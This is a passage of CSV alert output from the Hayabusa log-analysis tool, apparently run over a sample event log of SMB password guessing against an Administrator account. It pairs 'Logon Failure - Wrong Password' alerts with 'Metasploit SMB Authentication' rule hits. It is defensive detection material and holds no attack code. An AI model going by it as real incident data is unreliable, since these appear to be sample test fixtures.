Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:21.226 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: ejA3ZNfKWEs8zAMX : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:21.226 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:21.265 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: U5egiL2PGOrYCHv5 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:21.265 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:21.302 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: YYhIM3zla6KcbKbM : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:21.302 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:21.344 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: WjyQJnVBO4iC9Tkw : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:21.344 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:21.387 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: g6Tpp8TRa2nRxHzo : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:21.387 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:21.422 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: DyLvo5Bn2HzyANdH : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:21.422 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:21.465 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: NaXNThuZDGqJ7oCP : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:21.465 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:21.505 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 42Sb7p19cQsEV30b : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:21.505 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:21.540 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: An6629wgflzSgqY5 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:21.540 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:21.584 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: iO7JktEihqddmEtv : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:21.584 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:21.624 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: nG97BFOgKxnZaqi4 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:21.624 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:21.668 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: SH2D24c6nRGDL4Oe : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:21.668 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:21.712 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: uiu2yfaM2JQQZoLF : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:21.712 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:21.745 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: YQx9PG8DtR2tMjvS : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:21.745 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:21.792 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: OoAWryajKhLD7RyY : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:21.792 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:21.836 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: PgewSeaVugP1TXss : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:21.836 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:21.911 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: sPMCPdCAnz4upz8X : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:21.911 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:21.956 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: dUbV6xnGeBWE8Dif : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:21.956 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:22.001 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: dIJ9mZczFO1GKItV : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:22.001 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:22.044 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: wW0vxE4o68L70Sra : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:22.044 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:22.085 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: upOn9DzB1yWtntyX : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:22.085 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:22.116 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: m9uGgocAVReiJWDm : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:22.116 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:22.153 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: qm9Jf1fles2HOb3g : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:22.153 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:22.193 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: Ev5eTWdf3CskOMuh : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:22.193 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:22.223 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: QoiMO6sSLOm4fOD5 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:22.223 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:22.256 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: xDjvMsa2IgR9KO7l : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:22.256 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:22.293 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: SR7gVjxHZDYeK7pJ : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:22.293 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:22.323 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 4jzGAepr7JeNKuuk : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:22.323 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:22.368 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: H9baxEeRCWjx6Fzr : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:22.368 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:22.405 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: Uy7aTt0B4ErguacA : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:22.405 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:22.431 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: nvKcLrUXqu2vTKO3 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:22.431 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:22.486 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: PLycXLeAU21pdnXL : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:22.486 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:22.527 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: SgwjJSKOPnurDWW4 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:22.527 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:22.564 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: YPDYdxPoQAl8aGMs : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:22.564 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:22.594 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: CX8knunlT6SMpmQw : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:22.594 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:22.632 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: AAjYbt50leZt3Xve : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:22.632 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:22.677 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 3CD0HUCdg4UWOiji : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:22.677 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:22.709 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: dkeWmTE1R1rYaYP8 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:22.709 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:22.744 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: W87qcfSj4qWWUv4k : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:22.744 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:22.830 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: WUCyUQgbUqwaLj3J : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:22.830 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:22.877 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: Q9nLhDbcvmVBZp4f : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:22.877 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:22.925 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: BBWo1zDdjaAeGDWW : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:22.925 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:22.960 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: vjHRFk2flmzzd1zg : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:22.960 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:23.000 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 53HYxs9s7fpP1y6V : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:23.000 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:23.035 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: tluqXKvVooP7VNyB : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:23.035 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:23.076 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 43m0nfi5tiv4TpSB : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:23.076 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:23.107 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: qjPyJXl984vViV6L : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:23.107 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB 